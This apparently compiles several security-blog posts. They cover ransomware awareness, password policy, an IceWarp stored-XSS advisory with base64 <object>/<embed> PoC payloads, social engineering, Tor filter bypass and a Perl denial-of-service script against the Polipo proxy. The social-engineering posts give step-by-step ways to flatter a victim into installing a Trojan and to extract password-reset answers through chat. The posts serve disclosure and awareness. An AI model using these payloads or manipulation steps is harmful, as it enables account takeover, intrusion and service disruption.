CTB-Locker Infection


CTB-Locker (Curve-Tor-Bitcoin Locker) is the next generation of the CryptoLocker Trojan, whose operation was shut down. What kind of Trojan is it? To explain that I have to ask another question: ever heard of ransomware? No? Ransomware is a kind of Trojan that locks your computer, or encrypts your files, and demands a payment to unlock it. In other words, ransomware takes your computer hostage and demands a ransom.

Let's talk about the background of ransomware and how and where it is being made. The Russian and Ukrainian cyber underground market is quite infamous. What it runs on is the services it provides to criminals, or to whoever is willing to pay. This started off with spam bots. Think about it: if you have to pay a million dollars to a company for your ad campaign, why not pay a thousand dollars to a spam bot master and get the same reach? Botnets came next and became the biggest service in the Russian underground. If you wanted to DoS or DDoS someone, you could rent a botnet for X amount of money, do your thing, make newspaper headlines and hand it back, or you could buy the botnet outright from the person selling it.

People in the Russian underground market had been offering ransomware as a service until the recent CryptoLocker crackdown. Now they have come up with a new ransomware, CTB-Locker, which is a very nasty Trojan. It encrypts all the files on an infected computer using elliptic-curve cryptography, with the private key needed for decryption held only by the criminals. Put simply, without that key the files cannot be decrypted, and the key cannot be guessed or brute-forced.

How it infects the user's computer (high-level, semi-technical steps):

  1. The user gets an email containing a zip file.
  2. Once the zip file is opened and the file inside it is run, it executes a dropper. Here the "dropper" is really a downloader: a small program that connects to a server controlled by the attackers, downloads the Trojan and installs it on the user's computer.
  3. CTB-Locker, once executed, encrypts the user's files and locks the computer behind the ransom screen.
  4. The user is given 96 hours to pay the ransom.
  5. Once the ransom is paid, the decryption key is supposed to be sent. Nothing forces the criminals to honour that, so paying is no guarantee of getting the files back.

More technical details can be found here.

In our line of work, cyber security, we often hear that humans are the weakest link in the security chain. As consultants we visit many clients, and guess what they say when we ask them to install an antivirus or anti-malware solution on their computers: "This is not important. I have nothing stored on my computer. If some hacker does get into my computer, he would find nothing."

This is a typical reaction, but what I tell them is that nowadays your computer is your responsibility. If we map the real world onto the cyber world, the phrase "harboring a fugitive" applies. You are deliberately leaving your computer vulnerable; if it gets infected, becomes part of a botnet and is used to take down some government organization, the investigators will come after you, because the IP address they logged is yours. What would you say then?

Nowadays there are threats of cyber war, cyber espionage, APTs and so on. When you connect your computer to a network or the internet, it is your responsibility to keep it from getting hacked.

That said, let's continue with how to protect yourself from CTB-Locker.

  1. Do not accept any file from an email sent by an unknown person, even if it is called "my_private_pics.zip".
  2. Even if the email is from a person you know, do not open the attachment until you confirm, through another channel, that it really was that person who sent it. Attackers routinely send from compromised or spoofed accounts.
  3. Keep your computer updated with all the latest patches. The applications you use, such as Java, Adobe Reader and Flash, WinZip, WinRAR and so on, should be on their latest versions; these are the components exploit kits go after.
  4. Your computer should have antivirus (AV) and firewall protection at all times. If you do not want to pay for an antivirus, go for Avast.
  5. Install an anti-malware (AM) program such as Spybot or Malwarebytes.

This would keep you safe from the vast majority of attacks, and keeping an offline backup of your files limits the damage if something does get through. But if you choose to disable the AV and the AM to check out my_private_pics.zip, the damage to your computer will be total human error.
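The first two protection steps come down to "do not run what is inside the zip", and a mail gateway or a cautious user can check that mechanically before anything is opened. The Python script below is an added example, not code from the original post or from any product named in it. It inspects a zip attachment, constructed inline for the demonstration, and flags the tricks the infection chain above relies on: an executable extension, a double extension such as .jpg.scr, an encrypted entry that scanners cannot look into, and a file whose content starts with the Windows PE header "MZ" whatever its name claims.

```python
import io
import zipfile

# File types Windows will execute on a double-click. A "pictures" archive has no
# business containing any of them.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                         ".vbs", ".vbe", ".wsf", ".hta", ".cpl", ".msi", ".ps1", ".lnk"}


def suspicious_members(zip_bytes: bytes) -> list:
    """Return (member name, reason) for every entry that should stop the attachment being opened."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1].lower()
            parts = base.split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            if ext in EXECUTABLE_EXTENSIONS:
                # "IMG_0042.jpg.scr" shows up as "IMG_0042.jpg" when Explorer hides known extensions
                reason = "double extension hiding an executable" if len(parts) > 2 else "executable extension"
                findings.append((info.filename, reason))
                continue
            if info.flag_bits & 0x1:
                # Password-protected entry: neither this check nor an AV engine can see inside it
                findings.append((info.filename, "encrypted entry, content cannot be scanned"))
                continue
            with zf.open(info) as member:
                magic = member.read(2)
            if magic == b"MZ":
                # Windows PE header: the content is a program, whatever the name says
                findings.append((info.filename, "PE executable content behind a %s name" % (ext or "bare")))
    return findings


def build_sample_attachment() -> bytes:
    """Constructed sample archive: a harmless JPEG-like file, a disguised screensaver and a renamed PE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("my_private_pics/holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)
        zf.writestr("my_private_pics/IMG_0042.jpg.scr", b"MZ\x90\x00" + b"\x00" * 64)
        zf.writestr("my_private_pics/notes.txt", b"MZ\x90\x00" + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in suspicious_members(build_sample_attachment()):
        print("REJECT %-40s %s" % (name, reason))
```

The extension and double-extension checks catch the campaign described above; the MZ check is the one that matters when the sender has simply renamed the program, and the encryption check is there because an archive that cannot be inspected should be treated as hostile rather than as unknown.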




How current Strong Password Policy is Wrong

This is what every security consultant out there is saying nowadays. It is not all wrong: strong passwords protect a person from being hacked. Passwords like abc123, aaaa, apple, orange, mango or any other fruit you might think of are bad passwords.

Nowadays companies ask for passwords longer than 8 characters, alphanumeric, first character capital, and so on. This is a good way to force a person to create a strong password, and it is a good thing.


It is also not a good thing. Every company building a UI nowadays is focusing on usability, meaning ease of use and ease of remembering.

Take tablets, for instance. Our parents, who have never used a computer, are happier with tablets than with computers, and even our children are happy with tablets and touch devices. Why is that? Because they are easy to use and you remember all the steps you have to perform to, for instance, run a game or any other app, or change a setting.

Nowadays one person has dozens of accounts: email, social networks, job portals, online banking and so on. Now the security consultant says that all the passwords should be different. And this is how the person feels:

The algorithms used to tell strong passwords from weak ones are simple. They usually do not check the content of the password; they only check that it is at least 8 characters, alphanumeric and so on. The user has to remember a different password for every account. That becomes a mess and is very tiring.

I said that the content of the password is not checked. Let's see an example of how the rules on a Windows machine joined to a domain can be satisfied without producing a good password.

I set the password 123456 and the system tells me it does not comply with the policy set by the domain. So I try abcd12345, and I get the same error. I try qwert, still an error. Fine, I try Abcdqwert, error again. Now I am frustrated. What I need is a number and a symbol, so I try Abcd@12345$ and BOOM! The password is accepted, my life is easy again and I am super happy.

Then comes a hacker who wants to get into my system. He tries all the easy passwords, but somehow he discovers the policy (it is usually no secret, and the rejection messages alone give most of it away): one capital letter, more than 8 characters and so on. Instead of trying everything, he tries only the combinations that fit the policy, and after a little while HE IS IN! I am pwned.

These policies are made to force a user to create a hard-to-guess password, but what people do not get is the HUMAN factor. Anyone who wants instant access to an account shouldn't have to think about the password and then take 30 seconds just to type it. No one wants that, and because of that we see passwords like 00000 and 1234567890. Also, nowadays everybody is using a smartphone, and for a user with an alphanumeric hard password it is even harder to keep typing the password again and again.

This is how the strong password policy in use throughout the world is wrong for the normal user who just has to log in for email. I am not saying that passwords should be so easy that a baby could crack them, but they shouldn't be this hard to use either. Unless and until the content of the password is checked, rules about length, alphanumerics, capitals and so on won't work at all.
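What the post describes can be written down as code. The block below is an added example, not code from the post or from any vendor's policy engine: passes_composition_policy is the kind of check most domains run (length and character classes only), and content_problems is the content check the post is asking for, built on a constructed stand-in word list. Abcd@12345$ sails through the first and is rejected by the second for three separate reasons.

```python
import re

# Composition rules as the post describes them: longer than 8 characters and at least
# one upper-case letter, one lower-case letter, one digit and one symbol.
def passes_composition_policy(pw: str) -> bool:
    return (len(pw) > 8
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"[0-9]", pw) is not None
            and re.search(r"[^A-Za-z0-9]", pw) is not None)


# Constructed stand-in for a real dictionary / leaked-password list.
COMMON_WORDS = {"password", "admin", "welcome", "letmein", "apple", "orange", "mango", "abcd", "qwert"}
# Keyboard rows plus the alphabet; runs taken from any of these are guessed first.
KEYBOARD_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890", "abcdefghijklmnopqrstuvwxyz"]


def _has_sequence(s: str, run: int = 4) -> bool:
    """True if s contains `run` consecutive characters of a keyboard row or the alphabet, in either direction."""
    for row in KEYBOARD_ROWS:
        for i in range(len(row) - run + 1):
            chunk = row[i:i + run]
            if chunk in s or chunk[::-1] in s:
                return True
    return False


def content_problems(pw: str) -> list:
    """Reasons a password that satisfies the composition rules is still easy to guess."""
    low = pw.lower()
    letters_only = re.sub(r"[^a-z]", "", low)  # what is left once the policy-pleasing digits and symbols go
    problems = []
    if _has_sequence(low):
        problems.append("keyboard or alphabet sequence")
    if any(word in letters_only for word in COMMON_WORDS if len(word) >= 4):
        problems.append("dictionary word")
    # Capitalised word, then digits and symbols tacked on the end: the shape users fall into
    # to satisfy the policy, and the first shape a mask attack enumerates.
    if re.fullmatch(r"[A-Z][a-z]+[^a-z]*", pw):
        problems.append("predictable shape: capitalised word followed by digits and symbols")
    return problems


def evaluate(pw: str) -> dict:
    """Both verdicts side by side, so the gap between them is visible."""
    return {"policy": passes_composition_policy(pw), "problems": content_problems(pw)}


if __name__ == "__main__":
    for candidate in ("123456", "qwert", "Abcd@12345$", "Tq7!vR9#mLz2"):
        print("%-14s %s" % (candidate, evaluate(candidate)))
```

The shape flagged last is exactly what a hashcat mask such as ?u?l?l?l?s?d?d?d?d?d?s walks through, which is why the hacker in the story gets in so quickly once he knows the policy.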


IceWarp Multiple Clients, Persistent Cross-Site Scripting (XSS)

Original Advisory : IceWarp Cross site Scripting

Video :

While going through the IceWarp client I found that it is possible to inject HTML element tags into an email signature and have a cross-site scripting (XSS) payload executed.

The versions I tested were:

  • 11.0.0 (2014-01-25) x64, tested on http://demo.icewarp.com/
  • 10.3.4

The details of the PoC are as follows:

IceWarp client version 10.3.4 does not filter the <embed> tag or the <object> tag in the signature. An attacker can put a specially crafted tag into the signature, and as soon as the signature is loaded the XSS payload executes.

The latest IceWarp client version, 11.0.0, was tested on IceWarp's own demo site, demo.icewarp.com. It filters the <embed> tag but not the <object> tag, so a malicious payload can still be injected into the signature, and as soon as the signature is selected it executes. On further testing it turned out that in this version the issue does not qualify as a fully persistent XSS: to attack someone, the attacker has to use social engineering to get the victim to paste the payload into their own signature and trigger it.

Once the XSS payload was embedded, it executed every time compose was clicked, but once the email was saved as a draft the payload disappeared. Notably, when ><script>alert(1);</script> was put into the signature box it was filtered immediately and never carried into the compose window, whereas the <embed> and <object> tags did execute at the compose-email level.

Proof of Concept
For version: IceWarp 11.0.0

><object data="data:text/html;base64,PC9zY3JpcHQ+PGltZyBzcmM9Ing6eCIgb25lcnJvcj0iYWxlcnQoU3RyaW5nLmZyb21DaGFyQ29kZSg4OCwxMTUsMTE1KSkiIC8+"></object>>

><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>>


For version: IceWarp 10.3.4

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
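The filtering behaviour described above, <script> and <embed> dropped but <object> let through, is what a tag blocklist produces: every tag the developer did not think of passes. The Python below is an added example written for this page, not IceWarp's code. It contrasts a blocklist sanitiser with an allowlist one over constructed signatures, one of which carries a shortened <object data="data:..."> payload of the same shape as the PoC. The sample markup, the tag lists and the helper names are the example's own.

```python
import html
from html.parser import HTMLParser

# Constructed sample signatures (the data: URIs are shortened; only their shape matters here).
SIG_OBJECT = '<p>Regards,<br>Usman</p><object data="data:text/html;base64,PC9zY3JpcHQ+"></object>'
SIG_EMBED = '<p>Regards</p><embed src="data:image/svg+xml;base64,PHN2Zz4=" type="image/svg+xml">'
SIG_SCRIPT = '<b>Regards</b><script>alert(1)</script>'

# What the 11.0.0 behaviour in the advisory looks like: a list of tags known to be bad.
BLOCKED_TAGS = {"script", "embed"}

# The other way round: the tags a signature may legitimately need, and the attributes each may carry.
ALLOWED_TAGS = {"p": (), "br": (), "b": (), "i": (), "a": ("href",)}


class _Rebuilder(HTMLParser):
    """Re-serialise markup, keeping a tag only when keep(tag) is true and an
    attribute only when attr_ok(tag, name, value) is true."""

    def __init__(self, keep, attr_ok):
        super().__init__(convert_charrefs=True)
        self._keep = keep
        self._attr_ok = attr_ok
        self._skip = 0  # >0 while inside a dropped <script>/<style>, whose text must not leak into the output
        self.out = []

    def handle_starttag(self, tag, attrs):
        if not self._keep(tag):
            if tag in ("script", "style"):
                self._skip += 1
            return
        kept = "".join(' %s="%s"' % (name, html.escape(value or "", quote=True))
                       for name, value in attrs if self._attr_ok(tag, name, value or ""))
        self.out.append("<%s%s>" % (tag, kept))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if not self._keep(tag):
            if tag in ("script", "style") and self._skip:
                self._skip -= 1
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data))


def _sanitise(markup, keep, attr_ok):
    parser = _Rebuilder(keep, attr_ok)
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


def blocklist_filter(markup: str) -> str:
    """Strip the tags on the blocklist; every other tag and attribute passes through untouched."""
    return _sanitise(markup, lambda tag: tag not in BLOCKED_TAGS, lambda tag, name, value: True)


def _safe_attr(tag, name, value):
    if name not in ALLOWED_TAGS.get(tag, ()):
        return False
    if name == "href":  # no javascript:, data: or other odd schemes
        return value.strip().lower().startswith(("http://", "https://", "mailto:"))
    return True


def allowlist_filter(markup: str) -> str:
    """Keep only tags and attributes that are explicitly permitted; <object>, <embed> and anything
    else the list does not name is dropped without having to be known in advance."""
    return _sanitise(markup, lambda tag: tag in ALLOWED_TAGS, _safe_attr)


if __name__ == "__main__":
    for sig in (SIG_OBJECT, SIG_EMBED, SIG_SCRIPT):
        print("blocklist:", blocklist_filter(sig))
        print("allowlist:", allowlist_filter(sig))
```

The blocklist version reproduces the advisory exactly: <embed> and <script> vanish, <object> with its data: URI survives. The allowlist version never has to learn about <object>, and it also refuses a javascript: href on the one tag it does let through.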

Social Network Information Harvesting (SNIH)

Social networks! For those who do not know what a social network is and what this blog post is all about, here is a quick introduction.

Social Network is


People share their personal or business information freely on these websites. The privacy settings are pretty customizable, and one can choose exactly what to show and what to hide. Despite all the security and privacy, information can still leak. Many of these social networks constantly change their privacy policies: at one point a picture you upload takes your privacy settings, at another it is public for the world to see, and you constantly have to check whether the material is public or not. For example, we performed a controlled check on Facebook to test this theory, and most of our friends' profile pictures were public. When we contacted them, they all said the same thing: the last picture they uploaded was private, and this one became public automatically when they uploaded it.

The point of this discussion is not to find flaws in social networking websites. It is that security gaps are inevitable, all of our information is on these giant networks, and if the information leaks for any reason, you are the one who loses. This is a great thing for spammers, who harvest email addresses and other personal information.

Social Network Information Harvesting is simply gathering the information about people that is available on these social networks. It can be a service for many kinds of customers: law enforcement, criminals, spammers, hackers, intelligence agencies.

SNIH can be applied in many scenarios, and the repercussions can be quite serious, not for those who do it but for the victims.

SNIH Scenario 1: [The scenario is based on Facebook]

Usually what SNIH implementers do is create a small game or application for users to play or access on Facebook. Most such applications ask for permissions like email, statuses, friend list and so on. If it is a legitimate application, fine, but if it is a malicious one, you can say goodbye to any privacy set by the user or the social network: the permission grant hands over exactly the data the privacy settings were supposed to protect.

The information gathered can be used to find trends for analysis, which is useful to law enforcement agencies. If personal statuses are harvested, one can determine a person's tendencies. If people with malicious intent get hold of this information, the question arises: apart from the obvious, email spamming, selling harvested pictures, stealing personal information and harvesting cell phone numbers, what else can they do? That takes us to the second scenario.

SNIH Scenario 2: [Disclaimer: This information is for educational purposes. We will not be held responsible for any misuse of this information]

In this scenario we will see an attack that can be carried out against innocent users. With two-factor authentication this attack might not work, but most of us do not opt for two-factor authentication.

The attack targets a user's email account. Usually, when we go to "forgot your password", the system asks a secret question that we have to answer in order to reset the password. Now the hacker goes to the targeted user's email provider and follows that procedure, and the secret question is, for example, "my favourite pet's name". Keep in mind that the account was made some years back and the person doesn't even remember the question, let alone the answer. Now comes the part where a little social engineering helps a lot. The attacker goes to Facebook. If he or she knows the target, it is a walk in the park, as most of the user's information is shown on his or her profile or home page, and anything missing can simply be asked. If the target is a stranger, the attacker adds the target as a friend and starts a conversation; after a day or so he can casually bring up pets and other things and then ask: "I just bought a dog, what name should I give it?" There is a good chance that the name that comes to the user's mind is the one they already use. Once the attacker has the answer, he just has to go back to the email provider, enter it and BOOM! He is in.

What happened here is that the attacker used information available on one network against another. The example above requires a little social engineering, but usually the questions are things like "my aunt's name", which can easily be extracted from the information the user has put on his or her profile.

To conclude, it is safe to say that Social Network Information Harvesting is wrong, and it doesn't matter whether law enforcement agencies use it or people with malicious intent do: the point is that the user doesn't know that the information is being harvested. That in itself is a crime, whoever is doing it.


Psychological Warfare

Human beings are stupid by default! Human stupidity never fails to amaze. We do very stupid things, unknowingly of course. This article is about how hackers, or anyone, can tap into the human mind and take advantage of it in every way possible, which is usually called exploitation. This is either taught, or some have the talent from birth, for example people like Kevin Mitnick.

Before writing this post I read a tweet from my Twitter bot saying "... do not worry about the Facebook cancellation email". That email is sent by hackers to fool innocent Facebook users into giving their username and password to the hacker. It kept me thinking: why does this happen, why do people fall prey to such scams? Technical or not, they fall for it. Why?

As an introduction, I would say that it usually happens because the hackers know your weaknesses, and by you I mean everybody. Hackers exploit these weaknesses to gain usernames, passwords and other information; this is usually called social engineering. The talent can be weaponized and used to overthrow governments, start wars, or for financial gain. Once the talent is weaponized and used that way, it is called psychological warfare.

Psychological warfare is mind games on steroids. Its applications and scope are exponentially broader. Now I will walk you through the process of psychological warfare as used by hackers, a shopkeeper, governments, the military and so on.

Exploiting Human Selfishness

Human beings are very selfish! A great man, who is my teacher as well as a very good friend, once argued that human beings are very selfish: they do nothing selflessly. I was against the argument and gave many valid points, such as loving my family or my parents, giving to charity and so on. How is that not a selfless act, when I get nothing in return? He smiled and said: doing charity lets your conscience be at peace. You love your parents because it gives you satisfaction. You don't do anything that doesn't give you satisfaction, hence it is selfish at some level. My point is that human beings are selfish. Everyone has built his or her own world around himself or herself, and they just want to gain anything and everything from it.

Coming back to how this is exploited. A simple example: everyone likes free stuff. A hacker drops a USB flash disk on your doorstep or in your lawn, and one would definitely pick it up and bring it home. From the hacker's perspective, any malware lurking on the USB stick gets executed, the computer gets infected, and the usernames and passwords for your Facebook, Yahoo, Hotmail and so on fly off to the hacker. The second example is the one I mentioned earlier, the current Facebook cancellation scam message in the inbox. Why is everybody clicking the link and getting hacked? Here is the thought process that would start in my mind if I didn't know about it. As soon as I got the message I would say "Nah dude, it's so fake!" and close the window. Then after an hour or so I would think: what if the message was legit? Whatever anyone says, they didn't get this message, I did! My Facebook account would be deleted and I would lose out. The hell with it, I just have to go to the link and get it over with. After that I go to the link and get hacked happily, but who cares, at least I saved my account from cancellation; so what if I got hacked, at least it would not get cancelled.

I hope my dear readers got the idea!

Exploiting The Human Ego

You must have heard the sentence "I am right!" Me, me, me, I don't care who you are and what you're saying, I am 100 percent right. You must have seen your bosses, elder siblings, teachers and so on make these statements. Now, what is the best way to turn a no into a yes, in a boss's case? You say: "Sir, you are the best boss ever, whatever you say is right, and I don't know much compared to you, your knowledge is much greater, but if you could accept blah blah blah, it would be great. I so want your input on this. Without your input this is nothing. Please accept this!" There is a good chance the no turns into a maybe, and a fair chance it turns into a YES. Everyone loves an ego boost!

Hacking an account using social engineering and this technique:

Phase 1 :

Chat with your victim for a while and find a common subject. Once that is done, start a conversation about something controversial, but never start by giving your own opinion. For example, say: "I don't know what this country is coming to", or "what this school is coming to". If the guy is a musician, say there aren't many bands in the school, the whole music scene is being destroyed, and you think his band is the best there is. The word flattery should come to mind! You will notice the guy starts giving his opinions, because everyone has problems, no one is happy with what he has. Just listen to what he says and say "Yeah man, exactly", and so on.

Phase 2 :

Take his email address, Skype and so on and hit him up. Befriend him to the point where he starts trusting you. Then start the social engineering attacks: get him to install a Trojan on his PC, and the list goes on.

See how a little ego boost helped you gain valuable access. The scope of this post is restricted to hacker attacks, but this can very easily be applied in the real world, to real problems.

Intercepting and Messing with the Thought Process

Everyone has his own thought process. If you say A in a room of three people, all three will start thinking of something different. The point is to make them think the same thing you are thinking. This is usually achieved by not giving them time to think and bombarding them with your own thoughts.

Whenever a group of people come into a room, or a classroom, they have their own thoughts. The human brain is naturally in a defensive state, and the people in the room do not grasp or accept at first what the teacher is saying. The key is to get to their level and talk about something of interest. The human mind has a vulnerability. To explain it, an example: two people are sitting in a room and a third is telling them his point of view on topic A; the other two won't accept it at first, but as soon as he finds common ground, say topic C, and they talk about C for ten minutes, the brain naturally lets its guard down. The weakness is that after that they will agree on topic A, and on any other topic too. So one has to build a common base; the rest is easy.

The second way to mess with the thought process is not to be desperate to convince. Anyone listening to what you say, no matter how absurd, will first refute the logic, but when they notice that your argument is suggestive rather than desperate, they will accept it eventually. The human mind needs time to process input.

Exploiting the Lack of Concentration

Everyone loves their own thing. If a person likes reading love stories, he or she would have zero concentration when reading, or being forced to read, a sci-fi story. This is what hackers exploit. For example, for an English professor, if there is no poetry then it's useless. If she gets an inbox message from a hacker posing as Facebook, and the message is very long, with authentic logos and everything of course, she skips everything and goes to the end, where there is a link to the hacker's page, and boom, the English professor got, as they say, "pwned!"

Lack of concentration is a major factor in these attacks being so successful.

These were some examples of the human weaknesses exploited in psychological warfare. I did not cover how to overthrow governments and so on, because for that I would have to write a whole book. As this blog is about hacking and security, I had to stay in scope.

The Cyber War !

Cyber war: a very big word that somehow doesn't seem so big. Let me first give an introduction to what a cyber war really is. The introduction is divided into two parts, general perception and reality.

General Perception :

Most people in the security field know what cyber war is; the general perception is the perception among non-technical and non-security folks. Whenever "cyber" is added to any word or sentence, the impact on the listener's mind is "Wow, what a cool name!" It doesn't matter how critical the sentence or the word is, most people don't take it seriously, and the thought that runs through their minds is "Yeah right, this is kids' stuff." Take cyber bullying: although its real-world impact is very high, there weren't any laws against it until recently. People used to think cyber space was a joke, for children having fun and messing around.

Similarly, when people hear about cyber war anywhere, they just don't take it seriously. In their minds they are like: "Cyber war, huh? What is that? What can a cyber war do to me or my country?" Because according to them, a cyber war is just a bunch of hackers with no social life attacking websites of other countries, defacing their web pages and then boasting about it online or among friends.

Then these people watch movies like "Die Hard 4.0" and start thinking of the whole concept as pure entertainment, destroying the slightest speck of seriousness the word had in their minds.

Reality :

In reality, a cyber war is a war that starts in cyber space and is followed by air and ground attacks, which are pretty real. In the current age, where cloud computing is the next big thing and next-generation network technology is in its adolescence, everything is controlled through a microchip; to simplify, everything is computerized. Nuclear facilities, hospitals, industry, military defence, electricity and so on are all controlled by computers. I give the example of "Die Hard 4.0" again. I am not infatuated with this movie, but the concept of the "fire sale" is pretty accurate, and as this blog is a reference for security people as well as a source of information for non-technical people, giving the example of a movie is better than explaining the whole science. To sum up: as everything is automated and computerized, one attacks the systems at the virtual level and brings them down, and once the country is crippled it is just a matter of walking in and claiming it.

Ok, enough with the introduction, now let's make things interesting. Let's start with Stuxnet! Stuxnet is a very sophisticated cyber weapon, widely attributed to the US and Israel, aimed at Iranian nuclear facilities. According to the press, it caused serious damage to Iran's nuclear programme. Then came the Duqu malware, reported as a successor to Stuxnet (the two share code). Duqu is quite different from Stuxnet: it has a modular structure like Stuxnet, but it isn't equipped with modules for attacking SCADA systems. It is only able to steal information from the host system. In recent years China has come onto the map as a threat to cyber defence: in 2010 Google blamed China for conducting very sophisticated attacks against Google's servers. The recent Anonymous attacks against the US as well as other countries are also worth mentioning, and WikiLeaks is also an important part of what is happening in the cyber world.

As cyber war is the new trend, it is very hard to distinguish between cyber criminals and cyber warriors or cyber soldiers. Cyber armies are being created with full government backing in many countries, as cyber space is now considered a domain with the same level of importance as the other domains of potential attack: land, sea, air.

A full-scale cyber war resembles a cold war: you don't see much activity, unlike in a conventional war, but it has the power to break a country the way the USSR broke up.

Bypass Online Filter Restriction

Hello again !

Disclaimer: All the material shown on this blog is for educational purposes ! We would not be held responsible for any illegal use of the material by any one !

Usually what happens is that people want to visit a website that is legitimate, but somehow it is on the block list given to a naive network administrator, and you want to download important stuff from it, but ITS BLOCKED! Your boss, teacher or whoever you report to doesn't want to hear about blocked sites. It's totally lame to them because they want results and you didn't deliver. This is a very common problem for employees, students and so on.

First of all you need to know a little about tunnelling. For that please check out my post about tunnelling, because your concept of how tunnelling works should be very clear. Today I will show how one can bypass these filters.

Tor stands for The Onion Router. Onion routing was first developed at the US Naval Research Laboratory a long time ago and was later released as free software for everyone to use, though a lot of the funding still comes from the US government and a lot of other parties. That is a good thing, because Tor was designed for anonymity: the goal was that users would be anonymous over the internet. Note that anonymity is all it gives you: Tor does not protect you from malware, drive-by exploits or a malicious page, and the exit node can read anything you send over plain HTTP.

In this post I cover bypassing filters, so anonymity is not the main focus. How it works: first go to the Tor site and download the Vidalia Bundle. Once downloaded, install the software and all its components.

After installation, run the Vidalia executable and wait for its icon in the tray on the right of the taskbar to turn green. Once that is done, go to the browser's network options and enter the following values in the corresponding fields:

Proxy Address :

Proxy Port : 8118 (the port the Polipo HTTP proxy that ships with the bundle listens on)

Save the settings and leave the options dialog by clicking OK.

Now you're good to go. To check whether the proxy is working, go to whatismyip.com and look at your IP address. To cross-check, visit that site before adding the proxy settings to your browser, note your IP address, then compare it with the one shown afterwards. If they differ, your browser traffic is leaving through the Tor network.

Enjoy! If your ISP or administrator is smart enough to block the Tor network somehow, go to the Tor control panel, click the settings button and then the network tab; it looks something like this:

If you use a proxy to access the internet, which is usually the case in universities and offices, this is where you give Tor the proxy details:

There are a few other techniques you could use to bypass the filters, but this one is by far the best.


Polipo Proxy Server Denial Of Service

Polipo is a caching HTTP proxy that ships with the Tor Vidalia bundle. Put in very abstract, non-technical terms, Polipo takes the browser's HTTP traffic and hands it to the Tor network; the user only has to point the browser at its port (8118 in the Tor bundle).

The software's download page and the exploit code are as follows:

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]
# Exploit Title: [POLIPO Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: []
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description  : By sending a crafted POST/PUT request to the server,
 the proxy server crashes !
[*] Exploitation :

#!/usr/bin/perl
# POLIPO Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible
# for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

use strict;
use warnings;
use IO::Socket::INET;

sub banner {
    print "+========================================================+\n";
    print "+ Program [POLIPO Denial Of Service]                     +\n";
    print "+ Author [Usman Saeed]                                   +\n";
    print "+ Company [Xc0re Security Research Group]                +\n";
    print "+ DATE: [30/09/11]                                       +\n";
    print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
    print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
    print "+ I would Not be responsible for any misuse of this code]+\n";
    print "+========================================================+\n";
}

my ($host, $PORT) = @ARGV;

# Print the usage banner and stop when the target host or port is missing.
if (!defined $host || !defined $PORT) {
    banner();
    exit 1;
}

# The crafted PUT request. Only its request line is shown on this page; the
# remaining header lines of the original payload are not reproduced here, so
# the request is terminated straight after the request line.
my $evil = "PUT / HTTP/1.1\r\n" .
           "\r\n";

my $sock = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => $PORT)
    || die "Cant connect to $host!";

banner();
print "\n";
print "[*] Initializing\n";
print "[*] Sendin evil Packet Buhahahahaha \n";
send($sock, $evil, 0);
print "[*] Crashed  \n";

# Read whatever the proxy sends back before it dies (nothing, if it crashed).
my $response;
recv($sock, $response, 1024, 0);
print $response if defined $response && length $response;



Gatecrashing the Google+ Launch Party

[ Disclaimer: All the material shown on this website is for educational purposes ! We would not be held responsible for any illegal use of the material by any one ! ]

Google+, the new buzz in town! I see everyone on Facebook commenting about Google+. What is Google+? It is a social networking project by Google. It has a lot of very nice features. It is not mature yet, but the limited release is still very nice. Because it is a limited release, even if you invite someone, they go to the page and it does not let them in: a message says that the limit has been exceeded.

